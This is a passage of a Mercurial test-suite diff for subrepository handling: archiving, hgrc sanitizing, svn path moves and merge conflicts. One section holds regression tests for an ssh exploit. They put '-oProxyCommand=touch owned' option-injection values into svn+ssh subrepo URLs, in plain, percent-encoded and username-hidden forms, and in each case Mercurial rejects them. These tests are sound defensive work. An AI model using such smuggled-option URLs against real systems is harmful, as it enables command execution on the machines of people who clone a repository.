539 archiving (obstruct): 1/1 files (100.00%)
539 archiving (obstruct): 1/1 files (100.00%)
540 archiving (recreated): 0 files
540 archiving (recreated): 0 files
541 archiving (s): 0/2 files (0.00%)
541 archiving (s): 0/2 files (0.00%)
542 archiving (s): 1/2 files (50.00%)
542 archiving (s): 1/2 files (50.00%)
543 archiving (s): 2/2 files (100.00%)
543 archiving (s): 2/2 files (100.00%)
544 $ find ../archive-exclude | sort
544 $ find ../archive-exclude | sort
545 ../archive-exclude
545 ../archive-exclude
546 ../archive-exclude/.hg_archival.txt
546 ../archive-exclude/.hg_archival.txt
547 ../archive-exclude/.hgsub
547 ../archive-exclude/.hgsub
548 ../archive-exclude/.hgsubstate
548 ../archive-exclude/.hgsubstate
549 ../archive-exclude/obstruct
549 ../archive-exclude/obstruct
550 ../archive-exclude/obstruct/other
550 ../archive-exclude/obstruct/other
551 ../archive-exclude/s
551 ../archive-exclude/s
552 ../archive-exclude/s/alpha
552 ../archive-exclude/s/alpha
553 ../archive-exclude/s/dir
553 ../archive-exclude/s/dir
554 ../archive-exclude/s/dir/epsilon.py
554 ../archive-exclude/s/dir/epsilon.py
555
555
556 Test forgetting files, not implemented in svn subrepo, used to
556 Test forgetting files, not implemented in svn subrepo, used to
557 traceback
557 traceback
558
558
559 #if no-windows
559 #if no-windows
560 $ hg forget 'notafile*'
560 $ hg forget 'notafile*'
561 notafile*: No such file or directory
561 notafile*: No such file or directory
562 [1]
562 [1]
563 #else
563 #else
564 $ hg forget 'notafile'
564 $ hg forget 'notafile'
565 notafile: * (glob)
565 notafile: * (glob)
566 [1]
566 [1]
567 #endif
567 #endif
568
568
569 Test a subrepo referencing a just moved svn path. Last commit rev will
569 Test a subrepo referencing a just moved svn path. Last commit rev will
570 be different from the revision, and the path will be different as
570 be different from the revision, and the path will be different as
571 well.
571 well.
572
572
573 $ cd "$WCROOT"
573 $ cd "$WCROOT"
574 $ svn up > /dev/null
574 $ svn up > /dev/null
575 $ mkdir trunk/subdir branches
575 $ mkdir trunk/subdir branches
576 $ echo a > trunk/subdir/a
576 $ echo a > trunk/subdir/a
577 $ svn add trunk/subdir branches
577 $ svn add trunk/subdir branches
578 A trunk/subdir (glob)
578 A trunk/subdir (glob)
579 A trunk/subdir/a (glob)
579 A trunk/subdir/a (glob)
580 A branches
580 A branches
581 $ svn ci -qm addsubdir
581 $ svn ci -qm addsubdir
582 $ svn cp -qm branchtrunk $SVNREPOURL/trunk $SVNREPOURL/branches/somebranch
582 $ svn cp -qm branchtrunk $SVNREPOURL/trunk $SVNREPOURL/branches/somebranch
583 $ cd ..
583 $ cd ..
584
584
585 $ hg init repo2
585 $ hg init repo2
586 $ cd repo2
586 $ cd repo2
587 $ svn co $SVNREPOURL/branches/somebranch/subdir
587 $ svn co $SVNREPOURL/branches/somebranch/subdir
588 A subdir/a (glob)
588 A subdir/a (glob)
589 Checked out revision 15.
589 Checked out revision 15.
590 $ echo "subdir = [svn] $SVNREPOURL/branches/somebranch/subdir" > .hgsub
590 $ echo "subdir = [svn] $SVNREPOURL/branches/somebranch/subdir" > .hgsub
591 $ hg add .hgsub
591 $ hg add .hgsub
592 $ hg ci -m addsub
592 $ hg ci -m addsub
593 $ hg up null
593 $ hg up null
594 0 files updated, 0 files merged, 2 files removed, 0 files unresolved
594 0 files updated, 0 files merged, 2 files removed, 0 files unresolved
595 $ hg up
595 $ hg up
596 A *subdir/a (glob)
596 A *subdir/a (glob)
597 Checked out revision 15.
597 Checked out revision 15.
598 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
598 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
599 $ cd ..
599 $ cd ..
600
600
601 Test sanitizing ".hg/hgrc" in subrepo
601 Test sanitizing ".hg/hgrc" in subrepo
602
602
603 $ cd sub/t
603 $ cd sub/t
604 $ hg update -q -C tip
604 $ hg update -q -C tip
605 $ cd s
605 $ cd s
606 $ mkdir .hg
606 $ mkdir .hg
607 $ echo '.hg/hgrc in svn repo' > .hg/hgrc
607 $ echo '.hg/hgrc in svn repo' > .hg/hgrc
608 $ mkdir -p sub/.hg
608 $ mkdir -p sub/.hg
609 $ echo 'sub/.hg/hgrc in svn repo' > sub/.hg/hgrc
609 $ echo 'sub/.hg/hgrc in svn repo' > sub/.hg/hgrc
610 $ svn add .hg sub
610 $ svn add .hg sub
611 A .hg
611 A .hg
612 A .hg/hgrc (glob)
612 A .hg/hgrc (glob)
613 A sub
613 A sub
614 A sub/.hg (glob)
614 A sub/.hg (glob)
615 A sub/.hg/hgrc (glob)
615 A sub/.hg/hgrc (glob)
616 $ svn ci -qm 'add .hg/hgrc to be sanitized at hg update'
616 $ svn ci -qm 'add .hg/hgrc to be sanitized at hg update'
617 $ svn up -q
617 $ svn up -q
618 $ cd ..
618 $ cd ..
619 $ hg commit -S -m 'commit with svn revision including .hg/hgrc'
619 $ hg commit -S -m 'commit with svn revision including .hg/hgrc'
620 $ grep ' s$' .hgsubstate
620 $ grep ' s$' .hgsubstate
621 16 s
621 16 s
622 $ cd ..
622 $ cd ..
623
623
624 $ hg -R tc pull -u -q 2>&1 | sort
624 $ hg -R tc pull -u -q 2>&1 | sort
625 warning: removing potentially hostile 'hgrc' in '$TESTTMP/sub/tc/s/.hg' (glob)
625 warning: removing potentially hostile 'hgrc' in '$TESTTMP/sub/tc/s/.hg' (glob)
626 warning: removing potentially hostile 'hgrc' in '$TESTTMP/sub/tc/s/sub/.hg' (glob)
626 warning: removing potentially hostile 'hgrc' in '$TESTTMP/sub/tc/s/sub/.hg' (glob)
627 $ cd tc
627 $ cd tc
628 $ grep ' s$' .hgsubstate
628 $ grep ' s$' .hgsubstate
629 16 s
629 16 s
630 $ test -f s/.hg/hgrc
630 $ test -f s/.hg/hgrc
631 [1]
631 [1]
632 $ test -f s/sub/.hg/hgrc
632 $ test -f s/sub/.hg/hgrc
633 [1]
633 [1]
634
634
635 Test that sanitizing is omitted in meta data area:
635 Test that sanitizing is omitted in meta data area:
636
636
637 $ mkdir s/.svn/.hg
637 $ mkdir s/.svn/.hg
638 $ echo '.hg/hgrc in svn metadata area' > s/.svn/.hg/hgrc
638 $ echo '.hg/hgrc in svn metadata area' > s/.svn/.hg/hgrc
639 $ hg update -q -C '.^1'
639 $ hg update -q -C '.^1'
640
640
641 $ cd ../..
641 $ cd ../..
642
643 SEC: test for ssh exploit
644
645 $ hg init ssh-vuln
646 $ cd ssh-vuln
647 $ echo "s = [svn]$SVNREPOURL/src" >> .hgsub
648 $ svn co --quiet "$SVNREPOURL"/src s
649 $ hg add .hgsub
650 $ hg ci -m1
651 $ echo "s = [svn]svn+ssh://-oProxyCommand=touch%20owned%20nested" > .hgsub
652 $ hg ci -m2
653 $ cd ..
654 $ hg clone ssh-vuln ssh-vuln-clone
655 updating to branch default
656 abort: potentially unsafe url: 'svn+ssh://-oProxyCommand=touch owned nested' (in subrepository "s")
657 [255]
658
659 also check that a percent encoded '-' (%2D) doesn't work
660
661 $ cd ssh-vuln
662 $ echo "s = [svn]svn+ssh://%2DoProxyCommand=touch%20owned%20nested" > .hgsub
663 $ hg ci -m3
664 $ cd ..
665 $ rm -r ssh-vuln-clone
666 $ hg clone ssh-vuln ssh-vuln-clone
667 updating to branch default
668 abort: potentially unsafe url: 'svn+ssh://-oProxyCommand=touch owned nested' (in subrepository "s")
669 [255]
670
671 also check that hiding the attack in the username doesn't work:
672
673 $ cd ssh-vuln
674 $ echo "s = [svn]svn+ssh://%2DoProxyCommand=touch%20owned%20foo@example.com/nested" > .hgsub
675 $ hg ci -m3
676 $ cd ..
677 $ rm -r ssh-vuln-clone
678 $ hg clone ssh-vuln ssh-vuln-clone
679 updating to branch default
680 abort: potentially unsafe url: 'svn+ssh://-oProxyCommand=touch owned foo@example.com/nested' (in subrepository "s")
681 [255]
@@ -1,1791 +1,1865 b''
1 Let commit recurse into subrepos by default to match pre-2.0 behavior:
1 Let commit recurse into subrepos by default to match pre-2.0 behavior:
2
2
3 $ echo "[ui]" >> $HGRCPATH
3 $ echo "[ui]" >> $HGRCPATH
4 $ echo "commitsubrepos = Yes" >> $HGRCPATH
4 $ echo "commitsubrepos = Yes" >> $HGRCPATH
5
5
6 $ hg init t
6 $ hg init t
7 $ cd t
7 $ cd t
8
8
9 first revision, no sub
9 first revision, no sub
10
10
11 $ echo a > a
11 $ echo a > a
12 $ hg ci -Am0
12 $ hg ci -Am0
13 adding a
13 adding a
14
14
15 add first sub
15 add first sub
16
16
17 $ echo s = s > .hgsub
17 $ echo s = s > .hgsub
18 $ hg add .hgsub
18 $ hg add .hgsub
19 $ hg init s
19 $ hg init s
20 $ echo a > s/a
20 $ echo a > s/a
21
21
22 Issue2232: committing a subrepo without .hgsub
22 Issue2232: committing a subrepo without .hgsub
23
23
24 $ hg ci -mbad s
24 $ hg ci -mbad s
25 abort: can't commit subrepos without .hgsub
25 abort: can't commit subrepos without .hgsub
26 [255]
26 [255]
27
27
28 $ hg -R s add s/a
28 $ hg -R s add s/a
29 $ hg files -S
29 $ hg files -S
30 .hgsub
30 .hgsub
31 a
31 a
32 s/a (glob)
32 s/a (glob)
33
33
34 $ hg -R s ci -Ams0
34 $ hg -R s ci -Ams0
35 $ hg sum
35 $ hg sum
36 parent: 0:f7b1eb17ad24 tip
36 parent: 0:f7b1eb17ad24 tip
37 0
37 0
38 branch: default
38 branch: default
39 commit: 1 added, 1 subrepos
39 commit: 1 added, 1 subrepos
40 update: (current)
40 update: (current)
41 phases: 1 draft
41 phases: 1 draft
42 $ hg ci -m1
42 $ hg ci -m1
43
43
44 test handling .hgsubstate "added" explicitly.
44 test handling .hgsubstate "added" explicitly.
45
45
46 $ hg parents --template '{node}\n{files}\n'
46 $ hg parents --template '{node}\n{files}\n'
47 7cf8cfea66e410e8e3336508dfeec07b3192de51
47 7cf8cfea66e410e8e3336508dfeec07b3192de51
48 .hgsub .hgsubstate
48 .hgsub .hgsubstate
49 $ hg rollback -q
49 $ hg rollback -q
50 $ hg add .hgsubstate
50 $ hg add .hgsubstate
51 $ hg ci -m1
51 $ hg ci -m1
52 $ hg parents --template '{node}\n{files}\n'
52 $ hg parents --template '{node}\n{files}\n'
53 7cf8cfea66e410e8e3336508dfeec07b3192de51
53 7cf8cfea66e410e8e3336508dfeec07b3192de51
54 .hgsub .hgsubstate
54 .hgsub .hgsubstate
55
55
56 Subrepopath which overlaps with filepath, does not change warnings in remove()
56 Subrepopath which overlaps with filepath, does not change warnings in remove()
57
57
58 $ mkdir snot
58 $ mkdir snot
59 $ touch snot/file
59 $ touch snot/file
60 $ hg remove -S snot/file
60 $ hg remove -S snot/file
61 not removing snot/file: file is untracked (glob)
61 not removing snot/file: file is untracked (glob)
62 [1]
62 [1]
63 $ hg cat snot/filenot
63 $ hg cat snot/filenot
64 snot/filenot: no such file in rev 7cf8cfea66e4 (glob)
64 snot/filenot: no such file in rev 7cf8cfea66e4 (glob)
65 [1]
65 [1]
66 $ rm -r snot
66 $ rm -r snot
67
67
68 Revert subrepo and test subrepo fileset keyword:
68 Revert subrepo and test subrepo fileset keyword:
69
69
70 $ echo b > s/a
70 $ echo b > s/a
71 $ hg revert --dry-run "set:subrepo('glob:s*')"
71 $ hg revert --dry-run "set:subrepo('glob:s*')"
72 reverting subrepo s
72 reverting subrepo s
73 reverting s/a (glob)
73 reverting s/a (glob)
74 $ cat s/a
74 $ cat s/a
75 b
75 b
76 $ hg revert "set:subrepo('glob:s*')"
76 $ hg revert "set:subrepo('glob:s*')"
77 reverting subrepo s
77 reverting subrepo s
78 reverting s/a (glob)
78 reverting s/a (glob)
79 $ cat s/a
79 $ cat s/a
80 a
80 a
81 $ rm s/a.orig
81 $ rm s/a.orig
82
82
83 Revert subrepo with no backup. The "reverting s/a" line is gone since
83 Revert subrepo with no backup. The "reverting s/a" line is gone since
84 we're really running 'hg update' in the subrepo:
84 we're really running 'hg update' in the subrepo:
85
85
86 $ echo b > s/a
86 $ echo b > s/a
87 $ hg revert --no-backup s
87 $ hg revert --no-backup s
88 reverting subrepo s
88 reverting subrepo s
89
89
90 Issue2022: update -C
90 Issue2022: update -C
91
91
92 $ echo b > s/a
92 $ echo b > s/a
93 $ hg sum
93 $ hg sum
94 parent: 1:7cf8cfea66e4 tip
94 parent: 1:7cf8cfea66e4 tip
95 1
95 1
96 branch: default
96 branch: default
97 commit: 1 subrepos
97 commit: 1 subrepos
98 update: (current)
98 update: (current)
99 phases: 2 draft
99 phases: 2 draft
100 $ hg co -C 1
100 $ hg co -C 1
101 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
101 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
102 $ hg sum
102 $ hg sum
103 parent: 1:7cf8cfea66e4 tip
103 parent: 1:7cf8cfea66e4 tip
104 1
104 1
105 branch: default
105 branch: default
106 commit: (clean)
106 commit: (clean)
107 update: (current)
107 update: (current)
108 phases: 2 draft
108 phases: 2 draft
109
109
110 commands that require a clean repo should respect subrepos
110 commands that require a clean repo should respect subrepos
111
111
112 $ echo b >> s/a
112 $ echo b >> s/a
113 $ hg backout tip
113 $ hg backout tip
114 abort: uncommitted changes in subrepository "s"
114 abort: uncommitted changes in subrepository "s"
115 [255]
115 [255]
116 $ hg revert -C -R s s/a
116 $ hg revert -C -R s s/a
117
117
118 add sub sub
118 add sub sub
119
119
120 $ echo ss = ss > s/.hgsub
120 $ echo ss = ss > s/.hgsub
121 $ hg init s/ss
121 $ hg init s/ss
122 $ echo a > s/ss/a
122 $ echo a > s/ss/a
123 $ hg -R s add s/.hgsub
123 $ hg -R s add s/.hgsub
124 $ hg -R s/ss add s/ss/a
124 $ hg -R s/ss add s/ss/a
125 $ hg sum
125 $ hg sum
126 parent: 1:7cf8cfea66e4 tip
126 parent: 1:7cf8cfea66e4 tip
127 1
127 1
128 branch: default
128 branch: default
129 commit: 1 subrepos
129 commit: 1 subrepos
130 update: (current)
130 update: (current)
131 phases: 2 draft
131 phases: 2 draft
132 $ hg ci -m2
132 $ hg ci -m2
133 committing subrepository s
133 committing subrepository s
134 committing subrepository s/ss (glob)
134 committing subrepository s/ss (glob)
135 $ hg sum
135 $ hg sum
136 parent: 2:df30734270ae tip
136 parent: 2:df30734270ae tip
137 2
137 2
138 branch: default
138 branch: default
139 commit: (clean)
139 commit: (clean)
140 update: (current)
140 update: (current)
141 phases: 3 draft
141 phases: 3 draft
142
142
143 test handling .hgsubstate "modified" explicitly.
143 test handling .hgsubstate "modified" explicitly.
144
144
145 $ hg parents --template '{node}\n{files}\n'
145 $ hg parents --template '{node}\n{files}\n'
146 df30734270ae757feb35e643b7018e818e78a9aa
146 df30734270ae757feb35e643b7018e818e78a9aa
147 .hgsubstate
147 .hgsubstate
148 $ hg rollback -q
148 $ hg rollback -q
149 $ hg status -A .hgsubstate
149 $ hg status -A .hgsubstate
150 M .hgsubstate
150 M .hgsubstate
151 $ hg ci -m2
151 $ hg ci -m2
152 $ hg parents --template '{node}\n{files}\n'
152 $ hg parents --template '{node}\n{files}\n'
153 df30734270ae757feb35e643b7018e818e78a9aa
153 df30734270ae757feb35e643b7018e818e78a9aa
154 .hgsubstate
154 .hgsubstate
155
155
156 bump sub rev (and check it is ignored by ui.commitsubrepos)
156 bump sub rev (and check it is ignored by ui.commitsubrepos)
157
157
158 $ echo b > s/a
158 $ echo b > s/a
159 $ hg -R s ci -ms1
159 $ hg -R s ci -ms1
160 $ hg --config ui.commitsubrepos=no ci -m3
160 $ hg --config ui.commitsubrepos=no ci -m3
161
161
162 leave sub dirty (and check ui.commitsubrepos=no aborts the commit)
162 leave sub dirty (and check ui.commitsubrepos=no aborts the commit)
163
163
164 $ echo c > s/a
164 $ echo c > s/a
165 $ hg --config ui.commitsubrepos=no ci -m4
165 $ hg --config ui.commitsubrepos=no ci -m4
166 abort: uncommitted changes in subrepository "s"
166 abort: uncommitted changes in subrepository "s"
167 (use --subrepos for recursive commit)
167 (use --subrepos for recursive commit)
168 [255]
168 [255]
169 $ hg id
169 $ hg id
170 f6affe3fbfaa+ tip
170 f6affe3fbfaa+ tip
171 $ hg -R s ci -mc
171 $ hg -R s ci -mc
172 $ hg id
172 $ hg id
173 f6affe3fbfaa+ tip
173 f6affe3fbfaa+ tip
174 $ echo d > s/a
174 $ echo d > s/a
175 $ hg ci -m4
175 $ hg ci -m4
176 committing subrepository s
176 committing subrepository s
177 $ hg tip -R s
177 $ hg tip -R s
178 changeset: 4:02dcf1d70411
178 changeset: 4:02dcf1d70411
179 tag: tip
179 tag: tip
180 user: test
180 user: test
181 date: Thu Jan 01 00:00:00 1970 +0000
181 date: Thu Jan 01 00:00:00 1970 +0000
182 summary: 4
182 summary: 4
183
183
184
184
185 check caching
185 check caching
186
186
187 $ hg co 0
187 $ hg co 0
188 0 files updated, 0 files merged, 2 files removed, 0 files unresolved
188 0 files updated, 0 files merged, 2 files removed, 0 files unresolved
189 $ hg debugsub
189 $ hg debugsub
190
190
191 restore
191 restore
192
192
193 $ hg co
193 $ hg co
194 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
194 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
195 $ hg debugsub
195 $ hg debugsub
196 path s
196 path s
197 source s
197 source s
198 revision 02dcf1d704118aee3ee306ccfa1910850d5b05ef
198 revision 02dcf1d704118aee3ee306ccfa1910850d5b05ef
199
199
200 new branch for merge tests
200 new branch for merge tests
201
201
202 $ hg co 1
202 $ hg co 1
203 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
203 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
204 $ echo t = t >> .hgsub
204 $ echo t = t >> .hgsub
205 $ hg init t
205 $ hg init t
206 $ echo t > t/t
206 $ echo t > t/t
207 $ hg -R t add t
207 $ hg -R t add t
208 adding t/t (glob)
208 adding t/t (glob)
209
209
210 5
210 5
211
211
212 $ hg ci -m5 # add sub
212 $ hg ci -m5 # add sub
213 committing subrepository t
213 committing subrepository t
214 created new head
214 created new head
215 $ echo t2 > t/t
215 $ echo t2 > t/t
216
216
217 6
217 6
218
218
219 $ hg st -R s
219 $ hg st -R s
220 $ hg ci -m6 # change sub
220 $ hg ci -m6 # change sub
221 committing subrepository t
221 committing subrepository t
222 $ hg debugsub
222 $ hg debugsub
223 path s
223 path s
224 source s
224 source s
225 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
225 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
226 path t
226 path t
227 source t
227 source t
228 revision 6747d179aa9a688023c4b0cad32e4c92bb7f34ad
228 revision 6747d179aa9a688023c4b0cad32e4c92bb7f34ad
229 $ echo t3 > t/t
229 $ echo t3 > t/t
230
230
231 7
231 7
232
232
233 $ hg ci -m7 # change sub again for conflict test
233 $ hg ci -m7 # change sub again for conflict test
234 committing subrepository t
234 committing subrepository t
235 $ hg rm .hgsub
235 $ hg rm .hgsub
236
236
237 8
237 8
238
238
239 $ hg ci -m8 # remove sub
239 $ hg ci -m8 # remove sub
240
240
241 test handling .hgsubstate "removed" explicitly.
241 test handling .hgsubstate "removed" explicitly.
242
242
243 $ hg parents --template '{node}\n{files}\n'
243 $ hg parents --template '{node}\n{files}\n'
244 96615c1dad2dc8e3796d7332c77ce69156f7b78e
244 96615c1dad2dc8e3796d7332c77ce69156f7b78e
245 .hgsub .hgsubstate
245 .hgsub .hgsubstate
246 $ hg rollback -q
246 $ hg rollback -q
247 $ hg remove .hgsubstate
247 $ hg remove .hgsubstate
248 $ hg ci -m8
248 $ hg ci -m8
249 $ hg parents --template '{node}\n{files}\n'
249 $ hg parents --template '{node}\n{files}\n'
250 96615c1dad2dc8e3796d7332c77ce69156f7b78e
250 96615c1dad2dc8e3796d7332c77ce69156f7b78e
251 .hgsub .hgsubstate
251 .hgsub .hgsubstate
252
252
253 merge tests
253 merge tests
254
254
255 $ hg co -C 3
255 $ hg co -C 3
256 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
256 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
257 $ hg merge 5 # test adding
257 $ hg merge 5 # test adding
258 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
258 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
259 (branch merge, don't forget to commit)
259 (branch merge, don't forget to commit)
260 $ hg debugsub
260 $ hg debugsub
261 path s
261 path s
262 source s
262 source s
263 revision fc627a69481fcbe5f1135069e8a3881c023e4cf5
263 revision fc627a69481fcbe5f1135069e8a3881c023e4cf5
264 path t
264 path t
265 source t
265 source t
266 revision 60ca1237c19474e7a3978b0dc1ca4e6f36d51382
266 revision 60ca1237c19474e7a3978b0dc1ca4e6f36d51382
267 $ hg ci -m9
267 $ hg ci -m9
268 created new head
268 created new head
269 $ hg merge 6 --debug # test change
269 $ hg merge 6 --debug # test change
270 searching for copies back to rev 2
270 searching for copies back to rev 2
271 resolving manifests
271 resolving manifests
272 branchmerge: True, force: False, partial: False
272 branchmerge: True, force: False, partial: False
273 ancestor: 1f14a2e2d3ec, local: f0d2028bf86d+, remote: 1831e14459c4
273 ancestor: 1f14a2e2d3ec, local: f0d2028bf86d+, remote: 1831e14459c4
274 starting 4 threads for background file closing (?)
274 starting 4 threads for background file closing (?)
275 .hgsubstate: versions differ -> m (premerge)
275 .hgsubstate: versions differ -> m (premerge)
276 subrepo merge f0d2028bf86d+ 1831e14459c4 1f14a2e2d3ec
276 subrepo merge f0d2028bf86d+ 1831e14459c4 1f14a2e2d3ec
277 subrepo t: other changed, get t:6747d179aa9a688023c4b0cad32e4c92bb7f34ad:hg
277 subrepo t: other changed, get t:6747d179aa9a688023c4b0cad32e4c92bb7f34ad:hg
278 getting subrepo t
278 getting subrepo t
279 resolving manifests
279 resolving manifests
280 branchmerge: False, force: False, partial: False
280 branchmerge: False, force: False, partial: False
281 ancestor: 60ca1237c194, local: 60ca1237c194+, remote: 6747d179aa9a
281 ancestor: 60ca1237c194, local: 60ca1237c194+, remote: 6747d179aa9a
282 t: remote is newer -> g
282 t: remote is newer -> g
283 getting t
283 getting t
284 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
284 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
285 (branch merge, don't forget to commit)
285 (branch merge, don't forget to commit)
286 $ hg debugsub
286 $ hg debugsub
287 path s
287 path s
288 source s
288 source s
289 revision fc627a69481fcbe5f1135069e8a3881c023e4cf5
289 revision fc627a69481fcbe5f1135069e8a3881c023e4cf5
290 path t
290 path t
291 source t
291 source t
292 revision 6747d179aa9a688023c4b0cad32e4c92bb7f34ad
292 revision 6747d179aa9a688023c4b0cad32e4c92bb7f34ad
293 $ echo conflict > t/t
293 $ echo conflict > t/t
294 $ hg ci -m10
294 $ hg ci -m10
295 committing subrepository t
295 committing subrepository t
296 $ HGMERGE=internal:merge hg merge --debug 7 # test conflict
296 $ HGMERGE=internal:merge hg merge --debug 7 # test conflict
297 searching for copies back to rev 2
297 searching for copies back to rev 2
298 resolving manifests
298 resolving manifests
299 branchmerge: True, force: False, partial: False
299 branchmerge: True, force: False, partial: False
300 ancestor: 1831e14459c4, local: e45c8b14af55+, remote: f94576341bcf
300 ancestor: 1831e14459c4, local: e45c8b14af55+, remote: f94576341bcf
301 starting 4 threads for background file closing (?)
301 starting 4 threads for background file closing (?)
302 .hgsubstate: versions differ -> m (premerge)
302 .hgsubstate: versions differ -> m (premerge)
303 subrepo merge e45c8b14af55+ f94576341bcf 1831e14459c4
303 subrepo merge e45c8b14af55+ f94576341bcf 1831e14459c4
304 subrepo t: both sides changed
304 subrepo t: both sides changed
305 subrepository t diverged (local revision: 20a0db6fbf6c, remote revision: 7af322bc1198)
305 subrepository t diverged (local revision: 20a0db6fbf6c, remote revision: 7af322bc1198)
306 starting 4 threads for background file closing (?)
306 starting 4 threads for background file closing (?)
307 (M)erge, keep (l)ocal [working copy] or keep (r)emote [merge rev]? m
307 (M)erge, keep (l)ocal [working copy] or keep (r)emote [merge rev]? m
308 merging subrepository "t"
308 merging subrepository "t"
309 searching for copies back to rev 2
309 searching for copies back to rev 2
310 resolving manifests
310 resolving manifests
311 branchmerge: True, force: False, partial: False
311 branchmerge: True, force: False, partial: False
312 ancestor: 6747d179aa9a, local: 20a0db6fbf6c+, remote: 7af322bc1198
312 ancestor: 6747d179aa9a, local: 20a0db6fbf6c+, remote: 7af322bc1198
313 preserving t for resolve of t
313 preserving t for resolve of t
314 starting 4 threads for background file closing (?)
314 starting 4 threads for background file closing (?)
315 t: versions differ -> m (premerge)
315 t: versions differ -> m (premerge)
316 picked tool ':merge' for t (binary False symlink False changedelete False)
316 picked tool ':merge' for t (binary False symlink False changedelete False)
317 merging t
317 merging t
318 my t@20a0db6fbf6c+ other t@7af322bc1198 ancestor t@6747d179aa9a
318 my t@20a0db6fbf6c+ other t@7af322bc1198 ancestor t@6747d179aa9a
319 t: versions differ -> m (merge)
319 t: versions differ -> m (merge)
320 picked tool ':merge' for t (binary False symlink False changedelete False)
320 picked tool ':merge' for t (binary False symlink False changedelete False)
321 my t@20a0db6fbf6c+ other t@7af322bc1198 ancestor t@6747d179aa9a
321 my t@20a0db6fbf6c+ other t@7af322bc1198 ancestor t@6747d179aa9a
322 warning: conflicts while merging t! (edit, then use 'hg resolve --mark')
322 warning: conflicts while merging t! (edit, then use 'hg resolve --mark')
323 0 files updated, 0 files merged, 0 files removed, 1 files unresolved
323 0 files updated, 0 files merged, 0 files removed, 1 files unresolved
324 use 'hg resolve' to retry unresolved file merges or 'hg update -C .' to abandon
324 use 'hg resolve' to retry unresolved file merges or 'hg update -C .' to abandon
325 subrepo t: merge with t:7af322bc1198a32402fe903e0b7ebcfc5c9bf8f4:hg
325 subrepo t: merge with t:7af322bc1198a32402fe903e0b7ebcfc5c9bf8f4:hg
326 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
326 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
327 (branch merge, don't forget to commit)
327 (branch merge, don't forget to commit)
328
328
329 should conflict
329 should conflict
330
330
331 $ cat t/t
331 $ cat t/t
332 <<<<<<< local: 20a0db6fbf6c - test: 10
332 <<<<<<< local: 20a0db6fbf6c - test: 10
333 conflict
333 conflict
334 =======
334 =======
335 t3
335 t3
336 >>>>>>> other: 7af322bc1198 - test: 7
336 >>>>>>> other: 7af322bc1198 - test: 7
337
337
338 11: remove subrepo t
338 11: remove subrepo t
339
339
340 $ hg co -C 5
340 $ hg co -C 5
341 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
341 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
342 $ hg revert -r 4 .hgsub # remove t
342 $ hg revert -r 4 .hgsub # remove t
343 $ hg ci -m11
343 $ hg ci -m11
344 created new head
344 created new head
345 $ hg debugsub
345 $ hg debugsub
346 path s
346 path s
347 source s
347 source s
348 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
348 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
349
349
350 local removed, remote changed, keep changed
350 local removed, remote changed, keep changed
351
351
352 $ hg merge 6
352 $ hg merge 6
353 remote [merge rev] changed subrepository t which local [working copy] removed
353 remote [merge rev] changed subrepository t which local [working copy] removed
354 use (c)hanged version or (d)elete? c
354 use (c)hanged version or (d)elete? c
355 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
355 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
356 (branch merge, don't forget to commit)
356 (branch merge, don't forget to commit)
357 BROKEN: should include subrepo t
357 BROKEN: should include subrepo t
358 $ hg debugsub
358 $ hg debugsub
359 path s
359 path s
360 source s
360 source s
361 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
361 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
362 $ cat .hgsubstate
362 $ cat .hgsubstate
363 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
363 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
364 6747d179aa9a688023c4b0cad32e4c92bb7f34ad t
364 6747d179aa9a688023c4b0cad32e4c92bb7f34ad t
365 $ hg ci -m 'local removed, remote changed, keep changed'
365 $ hg ci -m 'local removed, remote changed, keep changed'
366 BROKEN: should include subrepo t
366 BROKEN: should include subrepo t
367 $ hg debugsub
367 $ hg debugsub
368 path s
368 path s
369 source s
369 source s
370 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
370 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
371 BROKEN: should include subrepo t
371 BROKEN: should include subrepo t
372 $ cat .hgsubstate
372 $ cat .hgsubstate
373 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
373 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
374 $ cat t/t
374 $ cat t/t
375 t2
375 t2
376
376
377 local removed, remote changed, keep removed
377 local removed, remote changed, keep removed
378
378
379 $ hg co -C 11
379 $ hg co -C 11
380 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
380 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
381 $ hg merge --config ui.interactive=true 6 <<EOF
381 $ hg merge --config ui.interactive=true 6 <<EOF
382 > d
382 > d
383 > EOF
383 > EOF
384 remote [merge rev] changed subrepository t which local [working copy] removed
384 remote [merge rev] changed subrepository t which local [working copy] removed
385 use (c)hanged version or (d)elete? d
385 use (c)hanged version or (d)elete? d
386 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
386 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
387 (branch merge, don't forget to commit)
387 (branch merge, don't forget to commit)
388 $ hg debugsub
388 $ hg debugsub
389 path s
389 path s
390 source s
390 source s
391 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
391 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
392 $ cat .hgsubstate
392 $ cat .hgsubstate
